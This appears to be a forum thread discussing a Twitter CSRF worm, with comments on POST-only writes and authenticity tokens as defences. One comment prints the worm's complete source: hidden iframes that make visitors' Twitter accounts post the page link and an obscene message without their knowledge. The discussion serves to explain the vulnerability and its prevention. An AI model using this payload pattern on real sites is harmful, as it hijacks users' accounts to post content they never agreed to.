Below is the source of the worm for the curious - it's surprisingly very simple.<p><pre><code> <html>
<head></head>
<body>
<script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>
</body>
</html></code></pre>
Kids -- this is why you only support POST/PUTs for writes, and if possible, require some kind of authenticity token. I guess this is what al3x was talking about when he meant that Twitter should hire a security expert.
Twitter's blog post on the vulnerability: <a href="http://status.twitter.com/post/1192873885/malicious-links-on-twitter" rel="nofollow">http://status.twitter.com/post/1192873885/malicious-links-on...</a>.
Twitter is vulnerable to CSRF (which is what this is). And it is so simple to prevent it in rails (which is what twitter uses). Interestingly the page announcing csrf protection in rails uses a twitter csrf example. in 2007!! and twitter still hasn't done anything. <a href="http://m.onkey.org/2007/9/28/csrf-protection-for-your-existing-rails-application" rel="nofollow">http://m.onkey.org/2007/9/28/csrf-protection-for-your-existi...</a><p>Also this status post should be a POST.
Interesting that it hits just as the TC Hackday demos go live, I wonder how many of those are going to be using twitter and if this will affect them (will twitter take the api down for a bit while they fix this or if this is part of a hack)